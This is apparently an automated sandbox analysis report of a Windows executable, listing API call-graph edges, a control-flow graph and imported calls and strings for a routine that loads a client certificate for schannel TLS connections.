API calls 43844->43846 43845->43844 43847 de80b 43846->43847 43859 e2e23 17 API calls 43847->43859 43849 de815 43849->43805 43850->43819 43851->43819 43852->43805 43853->43820 43854->43826 43855->43805 43856->43839 43857->43839 43858->43839 43859->43849 43861 ccf30 43889 c32d3 43861->43889 43864 ccf54 calloc 43868 ccf70 calloc 43864->43868 43865 ccf45 43932 c9199 20 API calls 43865->43932 43867 cceee 43869 ccf7e 43868->43869 43899 d963b 43869->43899 43872 d963b 140 API calls 43873 ccfa8 43872->43873 43874 d963b 140 API calls 43873->43874 43875 ccfb4 43874->43875 43876 d963b 140 API calls 43875->43876 43877 ccfc0 43876->43877 43878 d963b 140 API calls 43877->43878 43880 ccfcc 43878->43880 43881 ccfef 43880->43881 43918 cda2f 43880->43918 43933 d978f 310 API calls 43881->43933 43883 cd00c 43883->43867 43884 cd016 43883->43884 43934 c343b 7 API calls 43884->43934 43886 cd01b 43935 c3460 26 API calls 43886->43935 43888 cd022 43888->43867 43890 d0dce 2 API calls 43889->43890 43891 c32ea 43890->43891 43892 c330a 43891->43892 43893 c32f4 malloc 43891->43893 43895 c330f 43891->43895 43937 c3279 free free free 43892->43937 43896 c3319 43893->43896 43897 c3303 43893->43897 43895->43864 43895->43865 43896->43895 43936 d0e10 free free 43897->43936 43900 d964f 43899->43900 43901 ccf9c 43899->43901 43900->43901 43902 d96fd 43900->43902 43903 d9673 43900->43903 43901->43872 43904 d9767 43902->43904 43905 d9706 43902->43905 43903->43901 43906 d96ec 43903->43906 43912 d96c2 43903->43912 43904->43901 43907 d976c 43904->43907 43905->43901 43909 d9741 43905->43909 43911 d9710 43905->43911 43906->43901 43938 e0e3f 11 API calls 43906->43938 43940 e0830 82 API calls 43907->43940 43909->43901 43913 d9746 calloc 43909->43913 43910 d9778 43910->43901 43911->43901 43939 e8f8c 60 API calls 43911->43939 43912->43901 43916 d96e4 free 43912->43916 43917 d975d calloc 43913->43917 43916->43901 43917->43901 43919 cda96 43918->43919 43925 cda54 43918->43925 43920 cdac4 43919->43920 43922 cda9a 43919->43922 43941 cd77a 25 API calls 2 library calls 43919->43941 43921 cdae7 43920->43921 43920->43922 43942 cd77a 25 API calls 2 library calls 43920->43942 43921->43922 43923 cdaf5 _strdup 43921->43923 43922->43880 43923->43922 43927 cdb07 43923->43927 43928 cd8d0 2 API calls 43925->43928 43930 cda76 43925->43930 43943 c9199 20 API calls 43927->43943 43928->43930 43930->43919 43930->43922 43931 cd8d0 2 API calls 43930->43931 43931->43919 43932->43867 43933->43883 43934->43886 43935->43888 43936->43892 43937->43895 43938->43901 43939->43901 43940->43910 43941->43920 43942->43921 43943->43922 43560 ccd66 43563 cc72b 43560->43563 43564 d027a 2 API calls 43563->43564 43565 cc74c _time64 43564->43565 43566 d6ba2 67 API calls 43565->43566 43567 cc775 43566->43567 43568 cc77b 43567->43568 43586 cc5d3 78 API calls 43567->43586 43570 cc98c 43571 d8b08 308 API calls 43570->43571 43571->43568 43572 cc97a 43591 ce407 17 API calls 2 library calls 43572->43591 43573 d760d 35 API calls 43581 cc797 43573->43581 43575 d8a2b 137 API calls 43575->43581 43578 cc9b1 _time64 43578->43581 43581->43570 43581->43572 43581->43573 43581->43575 43581->43578 43582 c9327 387 API calls 43581->43582 43583 d201d 14 API calls 43581->43583 43584 cc8d9 _time64 43581->43584 43587 ce407 17 API calls 2 library calls 43581->43587 43588 d2362 10 API calls 43581->43588 43589 d7276 143 API calls 43581->43589 43590 c920d free 43581->43590 43592 cc5d3 78 API calls 43581->43592 43582->43581 43583->43581 43584->43581 43586->43581 43587->43581 43588->43581 43589->43581 43590->43581 43591->43570 43592->43581 42590 c8f92 _mbscmp 42591 c8fd8 42590->42591 42592 c8fa6 42590->42592 42594 d0b38 14 API calls 42591->42594 42638 c310d 14 API calls _ValidateLocalCookies 42592->42638 42596 c8fe6 QueryPerformanceFrequency 42594->42596 42595 c8fab 42597 c8fc8 42595->42597 42639 d20f5 15 API calls 42595->42639 42608 c31fa GetStdHandle 42596->42608 42640 d0e10 free free 42597->42640 42603 c8fcf 42604 c9035 42603->42604 42605 c902a fflush 42605->42604 42606 c900b 42606->42605 42626 c8eec 42606->42626 42609 c320c GetConsoleMode 42608->42609 42610 c3266 42608->42610 42609->42610 42611 c321c 42609->42611 42617 c8e58 __acrt_iob_func malloc 42610->42617 42611->42610 42612 c3225 SetConsoleCtrlHandler 42611->42612 42612->42610 42613 c3243 SetConsoleMode 42612->42613 42614 c325c 42613->42614 42615 c3269 SetConsoleCtrlHandler 42613->42615 42641 1110ee _crt_atexit _register_onexit_function 42614->42641 42615->42610 42618 c8ed9 42617->42618 42619 c8e90 42617->42619 42648 c9199 20 API calls 42618->42648 42642 d2135 42619->42642 42622 c8e95 42625 c8ea6 42622->42625 42647 c9199 20 API calls 42622->42647 42624 c8ecb free 42624->42625 42625->42606 42691 d21c0 42626->42691 42629 c8f1a 42631 c8f32 free 42629->42631 42633 c8f28 fclose 42629->42633 42630 c8f0b 42630->42629 42632 c8f10 fclose 42630->42632 42634 c8f49 42631->42634 42635 c8f64 42631->42635 42632->42629 42633->42631 42699 c245c 89 API calls 42634->42699 42635->42605 42637 c8f56 free 42637->42634 42637->42635 42638->42595 42639->42595 42640->42603 42641->42610 42643 d2147 calloc 42642->42643 42646 d21a3 42642->42646 42644 d2181 42643->42644 42644->42646 42649 dd282 WSAStartup 42644->42649 42646->42622 42647->42624 42648->42625 42650 dd325 42649->42650 42652 dd2af 42649->42652 42653 110ca6 _ValidateLocalCookies 5 API calls 42650->42653 42651 dd31f WSACleanup 42651->42650 42652->42651 42654 dd2bd 42652->42654 42655 dd336 42653->42655 42664 f4e72 42654->42664 42655->42646 42660 dd2d9 GetProcAddress 42661 dd2f6 42660->42661 42662 d0b38 14 API calls 42661->42662 42663 dd304 QueryPerformanceFrequency 42662->42663 42663->42650 42665 f4e7c 42664->42665 42671 dd2c2 42664->42671 42666 d0b38 14 API calls 42665->42666 42667 f4e8a 42666->42667 42668 dd33a 11 API calls 42667->42668 42669 f4ea1 42668->42669 42670 f4eaa GetProcAddress 42669->42670 42669->42671 42670->42671 42671->42650 42672 dd33a GetModuleHandleA 42671->42672 42673 dd35c GetProcAddress _mbspbrk 42672->42673 42674 dd2d0 42672->42674 42675 dd391 42673->42675 42676 dd380 42673->42676 42674->42660 42674->42661 42679 dd3bf GetSystemDirectoryA 42675->42679 42680 dd395 GetProcAddress 42675->42680 42677 dd388 LoadLibraryA 42676->42677 42678 dd384 LoadLibraryExA 42676->42678 42677->42674 42678->42674 42679->42674 42681 dd3d4 malloc 42679->42681 42680->42679 42682 dd3a7 42680->42682 42686 dd402 GetSystemDirectoryA 42681->42686 42690 dd448 free 42681->42690 42682->42678 42688 dd410 42686->42688 42686->42690 42689 dd45d LoadLibraryA 42688->42689 42688->42690 42689->42690 42690->42674 42692 d21c9 42691->42692 42697 c8ef6 free 42691->42697 42693 d221c 42692->42693 42694 d2207 FreeLibrary 42692->42694 42692->42697 42700 f4ed8 42693->42700 42694->42693 42697->42629 42697->42630 42698 d2227 WSACleanup 42698->42697 42699->42637 42701 d2221 42700->42701 42702 f4ee1 FreeLibrary 42700->42702 42701->42697 42701->42698 42702->42701 42703 ccbae 42704 ccbcd 42703->42704 42707 ccc43 42703->42707 42704->42707 42733 d2235 42704->42733 42709 ccbf3 42709->42707 42710 ccc91 42709->42710 42711 d2677 3 API calls 42709->42711 42710->42707 42712 e16ca 308 API calls 42710->42712 42713 ccc16 42711->42713 42712->42707 42714 ccc1c _strdup 42713->42714 42717 d2677 3 API calls 42713->42717 42715 ccc2d 42714->42715 42716 ccc87 42714->42716 42740 d2920 free 42715->42740 42744 d2920 free 42716->42744 42720 ccc56 42717->42720 42722 ccc5c _strdup 42720->42722 42723 ccc93 42720->42723 42721 ccc33 42741 c9199 20 API calls 42721->42741 42722->42716 42726 ccc6d 42722->42726 42725 d2677 3 API calls 42723->42725 42727 ccc9d 42725->42727 42742 d2920 free 42726->42742 42727->42714 42729 ccca7 42727->42729 42745 c305c 10 API calls _ValidateLocalCookies 42729->42745 42730 ccc73 42743 c9159 15 API calls 42730->42743 42734 d2248 42733->42734 42735 d2243 42733->42735 42738 ccbde 42734->42738 42746 e1cdf calloc 42734->42746 42737 d2135 31 API calls 42735->42737 42737->42734 42739 d2362 10 API calls 42738->42739 42739->42709 42740->42721 42741->42707 42742->42730 42743->42707 42744->42710 42745->42710 42747 e1cfe calloc 42746->42747 42748 e1d08 42747->42748 42749 e1d10 calloc 42747->42749 42748->42738 42750 e1d28 calloc 42749->42750 42751 e1d4a 42750->42751 42752 e1d36 free 42750->42752 42766 e1aee 8 API calls 42751->42766 42752->42748 42755 e1d52 42756 e1d5f 42755->42756 42757 e1d98 free 42755->42757 42767 e7f41 6 API calls 42756->42767 42768 dd126 free 42757->42768 42759 e1d75 42759->42748 42762 e1db6 42769 e14fa 9 API calls 42762->42769 42764 e1dbd free 42764->42759 42766->42755 42767->42759 42768->42762 42769->42764 43944 d7fb3 43957 d7aab 43944->43957 43947 d6f2d 137 API calls 43948 d7ebc 43947->43948 43955 d7bff 43948->43955 43964 d7961 137 API calls 43948->43964 43950 d95e3 19 API calls 43950->43955 43951 f0211 20 API calls 43951->43955 43953 d89ca 43955->43950 43955->43951 43955->43953 43956 e2166 117 API calls 43955->43956 43963 d7961 137 API calls 43955->43963 43965 e9e52 18 API calls 43955->43965 43956->43955 43958 d7ac8 43957->43958 43961 d7ad0 43958->43961 43966 e9c3e 43958->43966 43960 d7aef 43960->43961 43974 f14e0 43960->43974 43961->43947 43961->43948 43963->43955 43964->43955 43965->43955 43967 e9c51 43966->43967 43970 e9c69 43966->43970 43969 e6fc7 167 API calls 43967->43969 43967->43970 43968 e9c70 43968->43960 43969->43970 43970->43968 43982 ea9a2 365 API calls 43970->43982 43972 e9cee 43972->43968 43973 e9d08 free 43972->43973 43973->43968 43975 f14f4 43974->43975 43976 e9c3e 366 API calls 43975->43976 43978 f14fd 43976->43978 43977 f154d 43977->43961 43978->43977 43979 f1534 43978->43979 43983 f1588 49 API calls 43978->43983 43979->43977 43981 f1630 167 API calls 43979->43981 43981->43977 43982->43972 43983->43979 43110 d7fea 43111 d7ff1 43110->43111 43132 d7ebc 43110->43132 43111->43132 43140 f1630 43111->43140 43113 d6f2d 137 API calls 43122 d8031 43113->43122 43115 f0211 20 API calls 43121 d7bff 43115->43121 43116 d95e3 19 API calls 43116->43121 43118 d89ca 43121->43115 43121->43116 43121->43118 43123 e2166 117 API calls 43121->43123 43191 d7961 137 API calls 43121->43191 43196 e9e52 18 API calls 43121->43196 43125 d6f2d 137 API calls 43122->43125 43127 d80dc 43122->43127 43192 dd6ad 17 API calls _ValidateLocalCookies 43122->43192 43123->43121 43124 d8130 43126 d81a1 43124->43126 43129 d8143 43124->43129 43125->43122 43126->43132 43193 ec6a7 19 API calls 43126->43193 43127->43124 43143 f2f70 43127->43143 43131 d6f2d 137 API calls 43129->43131 43129->43132 43130 d81c5 43133 d6f2d 137 API calls 43130->43133 43131->43132 43132->43121 43195 d7961 137 API calls 43132->43195 43134 d81e0 43133->43134 43137 d81f0 43134->43137 43194 ec1fd 111 API calls 43134->43194 43136 d8237 free 43136->43132 43137->43136 43197 e6fc7 43140->43197 43144 f2f97 43143->43144 43190 f2fa9 43144->43190 43214 f1c9a 43144->43214 43146 f2fcb 43147 f2ffa free 43146->43147 43148 f3004 43146->43148 43146->43190 43147->43148 43148->43190 43229 f0ca5 43148->43229 43152 f3084 free 43156 f30ac 43152->43156 43154 f3133 free 43159 f311f 43154->43159 43155 f30f1 free 43155->43159 43156->43154 43156->43155 43156->43190 43159->43190 43235 f206c 43159->43235 43161 f3163 43161->43190 43249 f2ca5 43161->43249 43165 f31ad 43165->43190 43266 dd26d 43165->43266 43168 f33eb 43412 dd126 free 43168->43412 43171 f3220 43171->43168 43172 dd26d 15 API calls 43171->43172 43173 f336b free 43172->43173 43175 f33a4 free 43173->43175 43176 f33be free 43175->43176 43176->43168 43177 f33cd 43176->43177 43177->43168 43299 f2995 43177->43299 43190->43124 43191->43121 43192->43122 43193->43130 43194->43137 43195->43121 43196->43121 43198 e6fe1 43197->43198 43201 d8018 43198->43201 43205 e6e70 43198->43205 43200 e6ff5 43200->43201 43210 105fd0 43200->43210 43201->43113 43201->43132 43203 ef716 7 API calls 43203->43201 43207 e6e7c 43205->43207 43206 e6e9b 43206->43200 43207->43206 43213 dd6ad 17 API calls _ValidateLocalCookies 43207->43213 43209 e6eaa 43209->43200 43211 1055c7 167 API calls 43210->43211 43212 e7026 43211->43212 43212->43201 43212->43203 43213->43209 43215 f1cae free 43214->43215 43218 f1cd6 43214->43218 43215->43218 43216 f1d16 free 43220 f1d2e 43216->43220 43218->43216 43223 f1dfa 43218->43223 43219 f1d5b 43413 f044e malloc ___from_strstr_to_strchr 43219->43413 43220->43219 43220->43223 43222 f1d62 43222->43223 43224 f1d72 free 43222->43224 43226 f1d85 ___from_strstr_to_strchr 43222->43226 43223->43146 43227 f1dd9 43224->43227 43228 f1dd1 free 43226->43228 43227->43223 43228->43227 43230 f0ccd 43229->43230 43232 f0d34 43230->43232 43234 f0ce5 free 43230->43234 43414 f0af6 159 API calls 43230->43414 43232->43234 43415 f0af6 159 API calls 43232->43415 43234->43152 43234->43190 43236 f20a7 43235->43236 43241 f2093 43235->43241 43416 d37e5 free free free free free 43236->43416 43243 f21c7 43241->43243 43244 f213e 43241->43244 43247 f2098 43241->43247 43417 d0e10 free free 43241->43417 43243->43161 43418 d3fae 23 API calls 43244->43418 43246 f215b 43246->43247 43419 d0e10 free free 43246->43419 43247->43243 43420 dd6ad 17 API calls _ValidateLocalCookies 43247->43420 43250 f2cb8 43249->43250 43251 f2cdc 43250->43251 43252 f2d52 43250->43252 43255 f2d64 43250->43255 43257 f2df2 43250->43257 43251->43190 43259 f2b7a 43251->43259 43421 dd6ad 17 API calls _ValidateLocalCookies 43252->43421 43254 f2e4e 43423 dd6ad 17 API calls _ValidateLocalCookies 43254->43423 43255->43254 43255->43257 43257->43251 43422 dd6ad 17 API calls _ValidateLocalCookies 43257->43422 43260 f2b8a 43259->43260 43265 f2bcb 43259->43265 43261 f2ba4 free 43260->43261 43262 f2bd9 43260->43262 43261->43265 43264 f2c0a free 43262->43264 43262->43265 43264->43265 43265->43165 43424 dd231 43266->43424 43268 dd27f 43268->43168 43269 f1eb9 43268->43269 43270 f203e 43269->43270 43271 f1ef1 43269->43271 43438 dd217 free realloc free 43270->43438 43271->43270 43272 f1efe 43271->43272 43431 d5da0 15 API calls 43272->43431 43275 f2060 43275->43171 43276 f2048 43276->43275 43280 dd26d 15 API calls 43276->43280 43277 f1f09 43278 f1f2d 43277->43278 43284 f1f0f 43277->43284 43432 d649e 96 API calls 43277->43432 43282 f1f33 43278->43282 43433 d649e 96 API calls 43278->43433 43280->43275 43283 d5d80 13 API calls 43282->43283 43283->43284 43284->43275 43285 f1f4a 43285->43282 43286 f1f82 43285->43286 43434 d649e 96 API calls 43285->43434 43286->43282 43436 d5f16 24 API calls _ValidateLocalCookies 43286->43436 43289 f1f70 43289->43282 43435 d649e 96 API calls 43289->43435 43290 f1f97 43290->43282 43291 f1f9d 43290->43291 43292 d5d80 13 API calls 43291->43292 43294 f1fa4 43292->43294 43437 dd217 free realloc free 43294->43437 43296 f1fba free 43296->43275 43298 f1fd8 43296->43298 43298->43275 43298->43276 43300 f29b5 43299->43300 43302 f2aea 43300->43302 43307 f2b4a 43300->43307 43308 f2a48 43300->43308 43301 f2b2d 43306 dd14a 3 API calls 43301->43306 43301->43307 43302->43301 43303 f2b08 43302->43303 43304 dd14a 3 API calls 43302->43304 43305 dd26d 15 API calls 43303->43305 43303->43307 43304->43303 43305->43301 43306->43307 43307->43168 43315 f1b0a 43307->43315 43439 e0ca8 25 API calls 43308->43439 43310 f2ad8 43310->43302 43448 df65c 9 API calls 43310->43448 43312 dd26d 15 API calls 43313 f2a6f 43312->43313 43313->43302 43313->43310 43313->43312 43440 dd14a 43313->43440 43316 f1b2e 43315->43316 43323 f1b55 43315->43323 43450 d4899 _gmtime64 43316->43450 43318 110ca6 _ValidateLocalCookies 5 API calls 43320 f1c18 43318->43320 43319 f1b42 43321 f1b4a 43319->43321 43324 f1b5e 43319->43324 43320->43168 43328 f187b 43320->43328 43323->43318 43324->43323 43332 f1896 ___from_strstr_to_strchr 43328->43332 43412->43190 43413->43222 43414->43232 43415->43234 43417->43244 43418->43246 43419->43247 43420->43243 43421->43251 43422->43251 43423->43251 43425 d1535 14 API calls 43424->43425 43426 dd24f 43425->43426 43428 dd25c 43426->43428 43430 dd126 free 43426->43430 43428->43268 43429 dd268 43429->43268 43430->43429 43431->43277 43432->43278 43433->43285 43434->43289 43435->43286 43436->43290 43437->43296 43438->43276 43439->43313 43441 dd171 43440->43441 43444 dd17e 43440->43444 43449 dd126 free 43441->43449 43443 dd176 43443->43313 43444->43443 43445 dd1ae realloc 43444->43445 43445->43443 43446 dd1b6 free 43445->43446 43446->43443 43448->43310 43449->43443 43450->43319 43508 d7de5 43509 d7df1 43508->43509 43529 ee579 43509->43529 43511 d7e19 43512 d7e41 43511->43512 43513 d7e21 43511->43513 43555 ef147 317 API calls 43512->43555 43514 dd632 17 API calls 43513->43514 43516 d7e3a 43514->43516 43533 d8c2c 43516->43533 43520 d7dc4 43527 d7bff 43520->43527 43556 d7961 137 API calls 43520->43556 43522 f0211 20 API calls 43522->43527 43523 d95e3 19 API calls 43523->43527 43525 d89ca 43527->43522 43527->43523 43527->43525 43528 e2166 117 API calls 43527->43528 43554 d7961 137 API calls 43527->43554 43557 e9e52 18 API calls 43527->43557 43528->43527 43531 ee589 43529->43531 43530 ee46c 20 API calls 43532 ee59f 43530->43532 43531->43530 43532->43511 43534 d752d 19 API calls 43533->43534 43539 d8c5c 43534->43539 43536 110ca6 _ValidateLocalCookies 5 API calls 43538 d7e5d 43536->43538 43538->43520 43538->43525 43546 ef162 43538->43546 43540 d8d22 43539->43540 43544 d8ddb 43539->43544 43545 d8ea6 43539->43545 43540->43539 43541 d8e9f 43540->43541 43540->43545 43558 d6ad7 6 API calls 43540->43558 43559 ece30 malloc malloc 43540->43559 43542 ed032 free 43541->43542 43542->43545 43543 ed032 free 43543->43544 43544->43543 43544->43545 43545->43536 43547 ef174 43546->43547 43548 e5c82 488 API calls 43547->43548 43550 ef183 43548->43550 43549 ef1a7 43549->43520 43550->43549 43551 d7405 18 API calls 43550->43551 43552 ef190 43551->43552 43553 e2166 117 API calls 43552->43553 43553->43549 43554->43527 43555->43516 43556->43527 43557->43527 43558->43540 43559->43540 43593 c31e0 43594 c31e9 43593->43594 43595 c31f4 43594->43595 43597 c31c0 43594->43597 43598 c31cd SetConsoleMode 43597->43598 43599 c31df 43597->43599 43598->43599 43599->43595 43636 1111e2 43637 1111ee ___scrt_is_nonwritable_in_current_image 43636->43637 43660 110f27 43637->43660 43639 11134e 43670 11155b IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 43639->43670 43640 1111f5 43640->43639 43644 11121f 43640->43644 43642 111355 exit 43643 11135b _exit 43642->43643 43645 111223 _initterm_e 43644->43645 43649 11126c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 43644->43649 43646 11124f _initterm 43645->43646 43647 11123e 43645->43647 43646->43649 43648 1112c0 _get_initial_narrow_environment __p___argv __p___argc 43650 c8f6e 43648->43650 43649->43648 43652 1112b8 _register_thread_local_exe_atexit_callback 43649->43652 43651 1112dc 43650->43651 43668 11167b GetModuleHandleW 43651->43668 43652->43648 43654 1112e6 43654->43642 43655 1112ea 43654->43655 43656 1112f3 43655->43656 43657 1112ee _cexit 43655->43657 43669 111099 8 API calls ___scrt_uninitialize_crt 43656->43669 43657->43656 43659 1112fc 43659->43647 43661 110f30 43660->43661 43671 11137a IsProcessorFeaturePresent 43661->43671 43663 110f3c 43672 111dbb 11 API calls 2 library calls 43663->43672 43665 110f41 ___scrt_uninitialize_crt 43666 110f45 43665->43666 43673 111dda 8 API calls 2 library calls 43665->43673 43666->43640 43668->43654 43669->43659 43670->43642 43671->43663 43672->43665 43673->43666

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 103ea4-103eb5 call 10336c 3 104563-104571 call 110ca6 0->3 4 103ebb-103ec9 0->4 5 103ee4 4->5 6 103ecb-103eda 4->6 10 103eea-103eec 5->10 6->5 9 103edc-103ee2 6->9 9->10 11 103f3d-103f47 10->11 12 103eee-103ef1 10->12 13 103f55-103f8f 11->13 14 103f49-103f4f 11->14 15 103ef3-103f00 12->15 16 103f0a 12->16 18 103f91-103fa2 13->18 19 103fa4-103faf _strdup 13->19 14->13 17 10445e-10447e calloc * 2 14->17 15->16 20 103f02-103f08 15->20 21 103f10-103f27 call 103b1a 16->21 32 104480-104494 call dd6ad 17->32 33 1044a9-1044d9 17->33 22 10400d-104015 18->22 23 1044a2-1044a4 19->23 24 103fb5-103fd6 call 103bb5 19->24 20->21 21->11 38 103f29-103f38 call dd6ad 21->38 29 104017-104023 call d251e 22->29 30 10404c-104059 22->30 28 104562 23->28 45 10432c 24->45 46 103fdc-103fe5 24->46 28->3 29->30 47 104025-104030 29->47 34 104063-104073 30->34 35 10405b-10405d 30->35 32->23 59 104496-10449c CertFreeCertificateContext 32->59 70 1044db-1044e4 33->70 43 104081-104087 34->43 44 104075-10407f 34->44 35->34 42 104332-104353 CertOpenStore 35->42 38->3 54 104355-104382 GetLastError call dd6ad free 42->54 55 104397-1043dd free CryptStringToBinaryA 42->55 50 10408d-10408f 43->50 44->50 45->42 51 103feb-104001 fopen 46->51 52 10430c-104321 call dd6ad free 46->52 57 104032 47->57 58 104038-104047 call dd6ad 47->58 61 104091-104098 free 50->61 62 104099-1040a1 50->62 51->52 63 104007 51->63 52->45 84 104383-104385 54->84 75 1043f9-104423 CertFindCertificateInStore 55->75 76 1043df-1043e1 55->76 57->58 58->84 59->23 61->62 68 1040a7-1040c3 fseek 62->68 69 1041a8 62->69 63->22 77 104150-10415a 68->77 78 1040c9-1040d5 ftell 68->78 74 1041ae-1041c8 69->74 71 1044f2-1044f4 70->71 72 1044e6-1044ec CertFreeCertificateContext 70->72 81 1044f6-104536 call da216 call dd6ad free 71->81 82 10453e-104540 71->82 72->71 85 1041d8 74->85 86 1041ca 74->86 89 104433-104435 75->89 90 104425-104432 free 75->90 87 1043e3-1043ea free 76->87 88 1043eb 76->88 91 10415c-104175 fseek 77->91 92 10419d-1041a3 77->92 79 1040d7 78->79 80 10414a 78->80 93 1040de 79->93 80->77 81->23 131 10453c 81->131 82->3 97 104560 82->97 95 104143-104145 84->95 96 10438b-10438c free 84->96 103 1041de-1041fb malloc 85->103 102 1041cd-1041d2 86->102 87->88 98 1043f1-1043f4 88->98 89->98 100 104437 89->100 90->89 91->93 99 10417b-104198 malloc 91->99 101 1040ea-1040ec 92->101 104 1040e4 93->104 95->28 96->55 97->28 110 104301 CertCloseStore 98->110 99->104 105 10443d-10445c CertCloseStore 100->105 107 104101 101->107 108 1040ee-1040ff fread 101->108 102->102 109 1041d4-1041d6 102->109 117 10425b 103->117 118 1041fd-1041ff 103->118 104->101 105->17 112 104108-104117 fclose 107->112 108->107 108->112 109->103 110->52 112->74 116 10411d-104142 call dd6ad free 112->116 116->95 119 104261-104268 117->119 121 104201-10421c MultiByteToWideChar 118->121 122 104249 118->122 125 104281-104283 119->125 126 10426a-104280 free 119->126 123 10424f-104251 121->123 128 10421e-104220 121->128 122->123 123->128 130 104253-104259 123->130 132 1042c3-1042dd CertFindCertificateInStore 125->132 133 104285-10428e GetLastError 125->133 126->125 129 104223-104247 PFXImportCertStore free 128->129 129->119 130->129 131->97 132->105 134 1042e3-104300 GetLastError call dd6ad 132->134 137 104290-1042a4 call dd6ad 133->137 138 1042a9-1042be call dd6ad 133->138 134->110 137->95 138->95
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00103FA5
                                          • Part of subcall function 00103BB5: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00103BC3
                                          • Part of subcall function 00103BB5: _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,CurrentUser,00000000), ref: 00103BE1
                                          • Part of subcall function 00103BB5: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00103CC8
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00118DD4), ref: 00103FF1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00104092
                                        • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002), ref: 001040AD
                                        • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001040CA
                                        • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000001,00000000), ref: 001040F3
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00104109
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104140
                                        • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000), ref: 00104161
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010418D
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001041F4
                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000008,?,00000000,00000000,00000001), ref: 00104214
                                        • PFXImportCertStore.CRYPT32(?,00000000,00000000), ref: 0010422D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104244
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010427E
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00104285
                                        • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,00000000,00000000,00000000), ref: 001042CF
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001042E3
                                        • CertCloseStore.CRYPT32(?,00000000), ref: 00104301
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00104321
                                        • CertOpenStore.CRYPT32(00000009,00000000,00000000,?,?), ref: 00104345
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00104355
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104380
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0010438C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001043A6
                                        • CryptStringToBinaryA.CRYPT32(?,00000028,00000004,?,00000014), ref: 001043D5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 001043E4
                                        • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,00010000,00000014,00000000), ref: 00104415
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00104426
                                        • CertCloseStore.CRYPT32(?), ref: 00104456
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00104470
                                        • CertFreeCertificateContext.CRYPT32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0010449C
                                        • CertFreeCertificateContext.CRYPT32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001044EC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010452A
                                        Strings
                                        • schannel: unable to allocate memory, xrefs: 00104480
                                        • schannel: Failed to import cert file %s, last error is 0x%x, xrefs: 001042B0
                                        • schannel: Failed to get certificate from file %s, last error is 0x%x, xrefs: 001042F0
                                        • Microsoft Unified Security Protocol Provider, xrefs: 001044C8
                                        • schannel: Failed to get certificate location or file for %s, xrefs: 00104312
                                        • (memory blob), xrefs: 0010402B, 00104038, 00104075
                                        • schannel: Failed to read cert file %s, xrefs: 00104123
                                        • schannel: Failed to import cert file %s, password is bad, xrefs: 00104296
                                        • schannel: AcquireCredentialsHandle failed: %s, xrefs: 00104506
                                        • schannel: Failed to open cert store %x %s, last error is 0x%x, xrefs: 00104363
                                        • schannel: certificate format compatibility error for %s, xrefs: 00104039
                                        • Unable to set ciphers to passed via SSL_CONN_CONFIG, xrefs: 00103F29
                                        • P12, xrefs: 00104017
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$Cert$Store$Certificate$ErrorLast$CloseContextFindFree_mbschrfseekmalloc$BinaryByteCharCryptImportMultiOpenStringWide_mbsnbcmp_strdupcallocfclosefopenfreadftell
